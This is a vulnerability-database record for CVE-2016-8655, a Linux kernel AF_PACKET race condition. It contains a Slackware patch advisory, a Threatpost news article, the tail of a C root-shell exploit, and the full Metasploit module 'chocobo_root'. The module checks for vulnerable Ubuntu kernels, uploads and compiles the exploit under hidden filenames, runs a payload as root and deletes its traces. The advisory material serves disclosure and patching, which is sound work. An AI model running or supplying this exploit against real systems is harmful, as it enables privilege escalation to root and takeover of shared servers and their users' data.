setting up namespace sandbox\\n\");\n setup_sandbox();\n dprintf(\"[~] done, namespace sandbox set up\\n\");\n wrapper();\n exit(0);\n }\n\n waitpid(pid, &status, 0);\n\n launch_rootshell();\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "New kernel packages are available for Slackware 14.2 and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/linux-4.4.38/*: Upgraded.\n This kernel fixes a security issue with a race condition in\n net/packet/af_packet.c that can be exploited to gain kernel code execution\n from unprivileged processes.\n Thanks to Philip Pettersson for discovering the bug and providing a patch.\n Be sure to upgrade your initrd after upgrading the kernel packages.\n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader.\n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition.\n For more information, see:\n https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-generic-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-generic-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-headers-4.4.38_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-huge-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-huge-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-modules-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-modules-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.38/kernel-source-4.4.38_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 
14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-generic-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-headers-4.4.38-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-huge-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-modules-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.38/kernel-source-4.4.38-noarch-1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-4.4.38-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-smp-4.4.38_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/kernel-headers-4.4.38_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-4.4.38_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 
-current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-firmware-20161211git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-generic-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-huge-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-modules-4.4.38-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/kernel-headers-4.4.38-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/k/kernel-source-4.4.38-noarch-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 packages:\n6546123d58d7747700d53b50254cd9ee kernel-firmware-20161211git-noarch-1.txz\n6d4ac49bddfe538504d34714e0bc1848 kernel-generic-4.4.38-i586-1.txz\nce4aa55e8c940c300df1ca47215a5df9 kernel-generic-smp-4.4.38_smp-i686-1.txz\nfdc3b1093f566c12733cf0fbdf50e897 kernel-headers-4.4.38_smp-x86-1.txz\n9f6f48199f75edd4d2bcfcbb734cc85f kernel-huge-4.4.38-i586-1.txz\n5ee68030a4e931150311d5a655d76597 kernel-huge-smp-4.4.38_smp-i686-1.txz\n0c21ed8ae016e9b35324269527ce65e3 kernel-modules-4.4.38-i586-1.txz\ne0317d4704c6f3739e255779aca0d71d kernel-modules-smp-4.4.38_smp-i686-1.txz\n3b819ecc1fbaeea79d91dab22d7cde30 kernel-source-4.4.38_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6546123d58d7747700d53b50254cd9ee kernel-firmware-20161211git-noarch-1.txz\n9e1f355c9f65488a44becf21f1b931c4 kernel-generic-4.4.38-x86_64-1.txz\n519a1736b1801a1436aacb60dc708e5e kernel-headers-4.4.38-x86-1.txz\n7a4652cae6fc2e705d023185b4a45b9e kernel-huge-4.4.38-x86_64-1.txz\n0b70933f764e704a431da0b19d6f37e8 kernel-modules-4.4.38-x86_64-1.txz\ndc5807d1a834de180c8b2348b9152b7f kernel-source-4.4.38-noarch-1.txz\n\nSlackware -current packages:\n6546123d58d7747700d53b50254cd9ee a/kernel-firmware-20161211git-noarch-1.txz\nbae8845ea023f5c1e851c1f503d59fa6 
a/kernel-generic-4.4.38-i586-1.txz\n89d57e431a53d1f64a3dca8bb394411d a/kernel-generic-smp-4.4.38_smp-i686-1.txz\n157fe721649169ee32a845c57f09b243 a/kernel-huge-4.4.38-i586-1.txz\na5865a56c564375a53fa1a67b0d18655 a/kernel-huge-smp-4.4.38_smp-i686-1.txz\n78985fd9803ad187e3313a77a5d5f2ca a/kernel-modules-4.4.38-i586-1.txz\n7f684811388dfd1fc0f07437ad0136b7 a/kernel-modules-smp-4.4.38_smp-i686-1.txz\nf927f4c156198939f4157b03a2c646eb d/kernel-headers-4.4.38_smp-x86-1.txz\n1722ca0eb556fe87fad6ea020df8b32c k/kernel-source-4.4.38_smp-noarch-1.txz\n\nSlackware x86_64 -current packages:\n6546123d58d7747700d53b50254cd9ee a/kernel-firmware-20161211git-noarch-1.txz\n544940654f066dc357f3461cd01c3e50 a/kernel-generic-4.4.38-x86_64-1.txz\n7a5e5636fa10d12757c965a45df62f48 a/kernel-huge-4.4.38-x86_64-1.txz\nb17dcbbd71e810883a51017102be2bbe a/kernel-modules-4.4.38-x86_64-1.txz\n6a99f704b0a41ad060d84d94bc45d6b1 d/kernel-headers-4.4.38-x86-1.txz\n6143c34a575b42851eeae8f889a98a06 k/kernel-source-4.4.38-noarch-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nIf you are using an initrd, you'll need to rebuild it.\n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.38-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.38 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.38-smp version when running\nmkinitrd_command_generator. 
Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.38 as the version.\n\nIf you are using lilo or elilo to boot the machine, you'll need to ensure\nthat the machine is properly prepared before rebooting.\n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou'll need to run \"lilo\" as root to reinstall the boot loader.\n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition.", "modified": "2016-12-12T23:10:22", "published": "2016-12-12T23:10:22", "id": "SSA-2016-347-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.931787", "type": "slackware", "title": "[slackware-security] kernel", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:22", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655"], "description": "A critical, local code-execution vulnerability in the Linux kernel was patched more than a week ago, continuing a run of serious security issues in the operating system, most of which have been hiding in the code for years.\n\nDetails on the vulnerability were published Tuesday by researcher Philip Pettersson, who said the vulnerable code was introduced in August 2011. A patch was pushed to the mainline Linux kernel Dec. 2, four days after it was privately disclosed. 
Pettersson has developed a proof-of-concept exploit specifically for Ubuntu distributions, but told Threatpost his attack could be ported to other distros with some changes.\n\nThe [vulnerability is a race condition](<http://seclists.org/oss-sec/2016/q4/607>) that was discovered in the af_packet implementation in the Linux kernel, and Pettersson said that a local attacker could exploit the bug to gain kernel code execution from unprivileged processes. He said the bug cannot be exploited remotely.\n\nPettersson\u2019s attack [opens a rootshell on Ubuntu 16.04](<http://seclists.org/oss-sec/2016/q4/621>); the exploit bypasses Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) protections at the kernel level. Both are features of Intel chips and hamper code execution in the kernel from user mode. Pettersson said the bypass happens because his attack does not use any userland memory in the exploitation process.\n\nPettersson provided a technical description of CVE-2016-8655 in an advisory published this week on the oss-sec mailing list:\n\n> \u201cTo create AF_PACKET sockets you need CAP_NET_RAW in your network namespace, which can be acquired by unprivileged processes on systems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc). It can be triggered from within containers to compromise the host kernel. 
On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug.\u201d\n\n\u201cBasically it\u2019s a bait-and-switch, the bug allows you to trick the kernel into thinking it is working with one kind of object, while you actually switched it to another kind of object before it could react,\u201d Pettersson told Threatpost.\n\nThe vulnerability not only enables local code execution, but can also allow an attacker to crash a server.\n\n\u201cDepends a bit on the scenario, but the most common attack scenarios for local privilege escalations on servers are: 1) A web server gets compromised through a buggy webapp (usually PHP), the attacker gets low-privilege access and escalates his privilege to root using an exploit like this. 2) An attacker steals someone\u2019s login credentials for a server with many users, such as shared hosting server or a big university server,\u201d Pettersson said. \u201cThe attacker then escalates to root and gets access to everyone\u2019s accounts and can pivot further into the network.\u201d\n\nPettersson\u2019s bug is latest critical Linux issue to be addressed in the past few months. In mid-November, a vulnerability in the [cryptsetup utility](<https://threatpost.com/cryptsetup-vulnerability-grants-root-shell-access-on-some-linux-systems/121963/>) used to set up encrypted filesystems on different Linux distributions was found and patched. The cryptsetup vulnerability paved the way for hackers to retrieve a root rescue shell and gain access to data on the hard drive and either modify it or move it off the machine.\n\nWeeks prior, the [Dirty Cow vulnerability](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>) surfaced, a nine-year-old vulnerability in the Linux copy-on-write feature that also enabled root privileges for a local attacker. The kernel was patched Oct. 19 and in major distributions shortly thereafter. 
Google, however, got around to pushing a fix to handset makers in November and pushed a [patch this week](<https://threatpost.com/dirty-cow-vulnerability-patched-in-android-security-bulletin/122266/>) to its Nexus and Pixel handsets and to the Android Open Source Project.\n\nIn early October, a [systemd vulnerability](<https://threatpost.com/hack-crashes-linux-distros-with-48-characters-of-code/121052/>) was disclosed; it allowed attackers with local access to crash Linux distributions with just 48 characters of code. That flaw, researcher Andrew Ayer said, was introduced two years ago into systemd 209.\n", "modified": "2016-12-14T13:49:04", "published": "2016-12-08T09:15:57", "id": "THREATPOST:71B135B09C0B20493E1A02875B015BA4", "href": "https://threatpost.com/old-linux-kernel-code-execution-bug-patched/122336/", "type": "threatpost", "title": "Old Linux Kernel Code Execution Bug Patched", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2018-05-22T17:24:44", "description": "", "published": "2018-05-22T00:00:00", "type": "packetstorm", "title": "AF_PACKET chocobo_root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-05-22T00:00:00", "id": "PACKETSTORM:147727", "href": "https://packetstormsecurity.com/files/147727/AF_PACKET-chocobo_root-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AF_PACKET chocobo_root Privilege Escalation', \n'Description' => %q{ \nThis module 
exploits a race condition and use-after-free in the \npacket_set_ring function in net/packet/af_packet.c (AF_PACKET) in \nthe Linux kernel to execute code as root (CVE-2016-8655). \n \nThe bug was initially introduced in 2011 and patched in 2016 in version \n4.4.0-53.74, potentially affecting a large number of kernels; however \nthis exploit targets only systems using Ubuntu (Trusty / Xenial) kernels \n4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as \nLinux Mint. \n \nThe target system must have unprivileged user namespaces enabled and \ntwo or more CPU cores. \n \nBypasses for SMEP, SMAP and KASLR are included. Failed exploitation \nmay crash the kernel. \n \nThis module has been tested successfully on Linux Mint 17.3 (x86_64); \nLinux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel \nversions 4.4.0-45-generic and 4.4.0-51-generic. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'rebel', # Discovery and chocobo_root.c exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Aug 12 2016', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'AKA', 'chocobo_root.c' ], \n[ 'EDB', '40871' ], \n[ 'CVE', '2016-8655' ], \n[ 'BID', '94692' ], \n[ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ], \n[ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ], \n[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ], \n[ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ], \n[ 'URL', 'https://usn.ubuntu.com/3151-1/' ], \n[ 'URL', 'https://www.securitytracker.com/id/1037403' ], \n[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ] \n], \n'DefaultTarget' => 0)) \nregister_options [ 
\nOptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \n] \nend \n \ndef timeout \ndatastore['TIMEOUT'].to_i \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c -lpthread\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \nrm_f \"#{path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{path}\" \nend \n \ndef exploit_data(file) \npath = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file \nfd = ::File.open path, 'rb' \ndata = fd.read fd.stat.size \nfd.close \ndata \nend \n \ndef live_compile? \nreturn false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \n \nif has_gcc? \nvprint_good 'gcc is installed' \nreturn true \nend \n \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \n \ndef check \nversion = kernel_release \nunless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/ \nvprint_error \"Linux kernel version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Linux kernel version #{version} is vulnerable\" \n \narch = kernel_hardware \nunless arch.include? 
'x86_64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \ncores = get_cpu_info[:cores].to_i \nmin_required_cores = 2 \nunless cores >= min_required_cores \nvprint_error \"System has less than #{min_required_cores} CPU cores\" \nreturn CheckCode::Safe \nend \nvprint_good \"System has #{cores} CPU cores\" \n \nunless userns_enabled? \nvprint_error 'Unprivileged user namespaces are not permitted' \nreturn CheckCode::Safe \nend \nvprint_good 'Unprivileged user namespaces are permitted' \n \nCheckCode::Appears \nend \n \ndef exploit \nif check != CheckCode::Appears \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload exploit executable \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('chocobo_root.c') \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' 
\nupload_and_chmodx executable_path, exploit_data('chocobo_root') \nend \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status \"Launching exploit (Timeout: #{timeout})...\" \noutput = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout \noutput.each_line { |line| vprint_status line.chomp } \nprint_status \"Cleaning up #{payload_path} and #{executable_path}..\" \nrm_f executable_path \nrm_f payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147727/af_packet_chocobo_root_priv_esc.rb.txt"}]}